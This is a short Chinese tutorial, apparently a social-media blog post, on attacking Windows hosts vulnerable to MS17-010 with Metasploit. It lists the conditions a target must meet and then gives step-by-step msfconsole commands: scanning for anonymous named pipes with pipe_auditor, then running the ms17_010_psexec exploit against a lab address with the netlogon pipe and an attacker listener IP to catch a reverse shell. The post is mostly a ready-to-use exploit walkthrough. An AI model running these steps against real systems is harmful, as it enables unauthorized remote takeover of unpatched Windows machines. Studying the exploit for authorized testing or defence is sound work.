一、ms17_010_psexec简介

MS17-010 的psexec是针对Microsoft Windows的两款最受欢迎的漏洞进行攻击。

CVE-2017-0146（EternalChampion / EternalSynergy）

CVE-2017-0143（EternalRomance / EternalSynergy）

与EternalBlue相比，此模块具有高可靠性和优先级，其中管道名可用于匿名登录（

二、使用ms17_010_psexec的前提

1.防火墙必须允许SMB流量出入

2.目标必须使用SMBv1协议

3.目标必须缺少MS17-010补丁

4.目标必须允许匿名IPC $和管道名

ms17_010图形化检测工具下载 #也可以用nmap、nessus或msf中自带模块进行扫描

三、利用

1. 用pipe_auditor扫描

首先利用scanner/smb/pipe_auditor模块扫描目标网段主机可用的管道名，其扫描出来的大多数为匿名的windows2003管道名,如需要扫描出更多的管道名，还需要提供可用的用户名和密码

use scanner/smb/pipe_auditor

set rhosts 192.168.131.128   //也可以设置网段,网段的时候要设置多线程，如，`set threads 10`

run

可以看到有这些管道名

netlogon lsarpc samr browser

2.利用ms17_010_psexec进行攻击

use exploit/windows/smb/ms17_010_psexec

set rhost 192.168.131.128

set NAMEDPIPE  netlogon

set lhost 172.29.192.60  #接受反弹回来的shell的IP，一般为攻击机IP

run

扫描下方二维码关注我公众号

或者微信搜索：凡哥共享